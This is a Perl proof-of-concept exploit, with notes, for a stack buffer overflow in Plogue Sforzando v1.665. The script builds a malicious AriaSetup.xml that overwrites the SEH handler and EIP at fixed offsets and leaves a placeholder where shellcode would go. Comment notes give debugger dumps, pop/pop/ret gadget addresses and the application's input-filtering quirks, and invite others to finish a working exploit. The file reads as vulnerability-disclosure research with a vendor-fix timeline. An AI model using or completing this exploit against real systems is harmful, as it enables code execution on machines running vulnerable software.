152 lines
No EOL
7.1 KiB
Perl
Executable file
152 lines
No EOL
7.1 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
|
|
##########################################################################################
|
|
# Exploit Title: Plogue Sforzando v1.665 Buffer Overflow POC
|
|
# Date Discovered: 10-29-2013
|
|
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
|
|
# Vulnerable Software: Sforzando v1.665
|
|
# Software Link: http://www.softpedia.com/dyn-postdownload.php?p=227357&t=0&i=1
|
|
# Vendor site: http://www.plogue.com/downloads/
|
|
# Version: 1.665
|
|
# Tested On: Windows XP SP3
|
|
##########################################################################################
|
|
# Timeline
|
|
# - 10-29: Vuln discovered, vendor contacted
|
|
# - 10-30: Vendor acknowleged receipt of bug report
|
|
# - 10-31: Vendor applied fix to software installers
|
|
##########################################################################################
|
|
# At first glance this seems to be a straightforward SEH BOF however it's not the case
|
|
# largely due to the way the application treats non-ASCII input (see notes after POC code)
|
|
# Refer to the notes at the end of POC code for more details
|
|
##########################################################################################
|
|
|
|
|
|
# The application loads the AriaSetup.xml file at launch and reads the product value
|
|
# By changing these values we can generate a BOF as follows
|
|
|
|
my $buffsize = 15000; # sets buffer size for consistent sized payload
|
|
|
|
# build the start of the xml file
|
|
my $header = '<?xml version="1.0" ?><Key>key</Key><AriaSetup version="1665">';
|
|
$header = $header . '<Property name="vendor" value="Plogue Art et Technologie, Inc"/>';
|
|
$header = $header . '<Property name="product" value="';
|
|
|
|
my $junk = "\x41" x 392; # 392 is the offset of next seh followed by 4920 bytes of controllable data
|
|
my $nseh = "\x42\x42\x42\x42"; # overwrite next seh
|
|
my $seh = "\x43\x43\x43\x43"; # overwrite seh (and EIP, offset 396)
|
|
my $shell = "\x45" x 5000; # placeholder for shell code; also accessible via ESP+2500 (length 4916)
|
|
|
|
my $sploit = $junk.$nseh.$seh.$nops.$shell; # assemble exploit portion of buffer
|
|
my $fill = "\x46" x ($buffsize - (length($header)+length($sploit))); # fill remainder of buffer
|
|
my $buffer = $header.$sploit.$fill; # construct the final buffer
|
|
|
|
# write the exploit buffer to file
|
|
my $file = "AriaSetup.xml";
|
|
open(FILE, ">$file");
|
|
print FILE $buffer;
|
|
close(FILE);
|
|
print "Exploit file created [" . $file . "]\n";
|
|
print "Buffer size: " . length($buffer) . "\n";
|
|
|
|
|
|
#############################################
|
|
#------------------- NOTES------------------#
|
|
#############################################
|
|
|
|
# after the above POC, seh chain looks like this:
|
|
|
|
# Address SE handler
|
|
# 0012E31C ntdll.7C9032BC
|
|
# 0012ECC4 43434343
|
|
# 42424242 *** CORRUPT ENTRY ***
|
|
|
|
# And the stack...
|
|
# ...
|
|
# 0012ECB0 41414141 AAAA
|
|
# 0012ECB4 41414141 AAAA
|
|
# 0012ECB8 41414141 AAAA
|
|
# 0012ECBC 41414141 AAAA
|
|
# 0012ECC0 41414141 AAAA
|
|
# 0012ECC4 42424242 BBBB Pointer to next SEH record
|
|
# 0012ECC8 43434343 CCCC SE handler
|
|
# 0012ECCC 44444444 DDDD
|
|
# 0012ECD0 44444444 DDDD
|
|
# 0012ECD4 44444444 DDDD
|
|
# 0012ECE0 44444444 DDDD
|
|
# 0012ECE4 44444444 DDDD
|
|
# ...
|
|
|
|
# And the registers...
|
|
|
|
# EAX 00000000
|
|
# ECX 43434343
|
|
# EDX 7C9032BC ntdll.7C9032BC
|
|
# EBX 00000000
|
|
# ESP 0012E308
|
|
# EBP 0012E328
|
|
# ESI 00000000
|
|
# EDI 00000000
|
|
# EIP 43434343
|
|
|
|
# So, next SEH is overwritten at offset 392, SEH (and EIP) at 396
|
|
# and there is plenty of room directly following for shellcode
|
|
|
|
# The problem that we have for an SEH BOF are the available pop/pop/ret and the input sanitization performed by the application
|
|
# Here are the 14 available pop/pop/ret found by mona (using -all switch)
|
|
|
|
# 0x72d11f39 : pop edi pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
|
|
# 0x72d1170b : pop esi pop ebx ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
|
|
# 0x72d1204e : pop esi pop ebx ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
|
|
# 0x72d115b8 : pop ebx pop ebp ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
|
|
# 0x72d1263d : pop edi pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
|
|
# 0x72d1269c : pop edi pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
|
|
# 0x00280b0b : call dword ptr ss:[ebp+30] | startnull,ascii {PAGE_READONLY}
|
|
# 0x72d119de : pop esi pop ebp ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
|
|
# 0x72d11225 : pop edi pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
|
|
# 0x72d1283f : pop eax pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
|
|
# 0x72d12899 : pop eax pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
|
|
# 0x72d128f3 : pop eax pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
|
|
# 0x72d12956 : pop eax pop esi ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
|
|
# 0x72d12ebe : pop ebx pop ebp ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
|
|
# 0x72d12f35 : pop ebx pop ebp ret | ASLR: False, Rebase: False, SafeSEH: False, OS: True (C:\WINDOWS\system32\msacm32.drv)
|
|
|
|
# The application only accepts certain characters as input, limited primarily to the ASCII character set, with some exceptions:
|
|
#
|
|
# All ASCII characters \x0a through \x7f appear to be accepted as-is except as follows:
|
|
# - \x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x26 -- these are stripped entirely
|
|
# - \x22 appears to be processed as a double quote and terminates the remainder of the xml string input
|
|
# - \x0a is replaced with \x0d
|
|
|
|
# Anything outside of the ASCII range appears to be stripped (or sometimes replaced)
|
|
# This poses a problem when trying to find a usable address for our overwrites
|
|
|
|
# For example, given the pop/pop/ret addresses found, we would need to include \xd1
|
|
|
|
# If we try to overwrite SEH with the the address 0x72d11225 (\x25\x12\xd1\x72) we get this:
|
|
|
|
# 0012ECBC 41414141 AAAA
|
|
# 0012ECC0 41414141 AAAA
|
|
# 0012ECC4 42424242 BBBB Pointer to next SEH record
|
|
# 0012ECC8 44721225 %%%D SE handler
|
|
# 0012ECCC 44444444 DDDD
|
|
# 0012ECD0 44444444 DDDD
|
|
|
|
# Notice how \xd1 is stripped (and our trailing input shifted).
|
|
# Through a bit of basic trial and error I noticed that you can
|
|
# force the application to retain input chars by appending other chars to it.
|
|
# For example to maintain \xd1 we can append \xa9 to it
|
|
|
|
# An SEH overwrite of \x25\x12\xd1\xa9\x72 would result in:
|
|
|
|
# 0012ECBC 41414141 AAAA
|
|
# 0012ECC0 41414141 AAAA
|
|
# 0012ECC4 42424242 BBBB Pointer to next SEH record
|
|
# 0012ECC8 A9D11225 %%%% SE handler
|
|
# 0012ECCC 44444472 rDDD
|
|
# 0012ECD0 44444444 DDDD
|
|
|
|
# This time \xd1 is maintained but unfortunately, the app also maintains the appended \xa9 byte
|
|
# which makes this approach innefective for addressing (but possibly useful for shellcode)
|
|
|
|
# I didn't have the time to investigate this any further but I figured I'd post this POC
|
|
# in case someone else wants to give it a go |